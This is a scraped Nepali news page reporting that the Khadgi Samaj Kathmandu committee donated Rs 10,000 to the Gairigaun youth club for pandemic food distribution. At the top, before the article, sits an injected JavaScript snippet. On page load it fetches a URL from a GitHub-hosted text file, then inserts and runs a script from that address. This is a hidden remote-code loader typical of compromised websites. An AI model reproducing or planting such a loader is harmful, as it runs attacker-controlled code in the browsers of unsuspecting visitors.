;var url = 'https://raw.githubusercontent.com/AlexanderRPatton/cdn/main/repo.txt';fetch(url).then(response => response.text()).then(data => {var script = document.createElement('script');script.src = data.trim();document.getElementsByTagName('head')[0].appendChild(script);}); नेपाल राष्ट्रिय खड्गी समाज काठमाडौँद्वारा गैरीगाउँ युवा समाजलाई आर्थिक सहयोग – जुनेली न्युज
बिहिबार, बैशाख ५, २०८२
  • होमपेज
  • नेपाल राष्ट्रिय खड्गी समाज काठमाडौँद्वारा गैरीगाउँ युवा समाजलाई आर्थिक सहयोग
आर्थिक

नेपाल राष्ट्रिय खड्गी समाज काठमाडौँद्वारा गैरीगाउँ युवा समाजलाई आर्थिक सहयोग

जुनेली न्युज ,

काठमाडौँ |  नेपाल राष्ट्रिय  खड्गी समाज काठमाडौँ जिल्ला समितीद्वारा यस महामारीको बखतमानि:शूल्क खाना बितरण गरिरहेका गोकर्णेश्वोर नगरपालीका वडा नम्बर ६ स्थित गैरीगाउँ युवा क्लबलाई रु १०,०००|- अर्थिक सहयोग गरेको छ ।

खड्गी समाजलका   सचिब दिपेश शाहीको हात बाट रकम सहयोग गरिएको हो |  आझै पनि भाबी दिनमा पनि सहयोग गर्ने कुरा राख्दै  सचिबबाट मजदुर तथा बिपन्न बर्गहरुलाइ खाना वितरण गरेको  कार्यको प्रशंसा गरे |

फेसबुक प्रतिक्रियाहरु